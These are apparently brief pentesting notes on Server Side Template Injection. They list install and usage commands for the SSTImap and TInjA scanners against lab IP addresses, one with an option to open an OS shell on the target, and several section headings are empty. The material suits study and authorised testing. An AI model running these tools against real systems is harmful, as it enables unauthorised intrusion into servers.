SSTI
Notes about some basic Server Side Template Injection attack
Server Side Template Injection (SSTI) is a web exploit which takes advantage of an insecure implementation of a template engine.
Playground
Identification

Tools
SSTImap
## Install
git clone https://github.com/vladko312/SSTImap
cd SSTImap
python3 -m venv sstimap_env
source sstimap_env/bin/activate
Usage:
python3 sstimap.py --help
python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/*
python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/* --engine Jinja2
python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/* --engine Jinja2 --os-shell

TInjA – the Template INJection Analyzer
tinja url -u "http://10.10.242.241:5000/vuln?name=a"

Resources
Last updated
Was this helpful?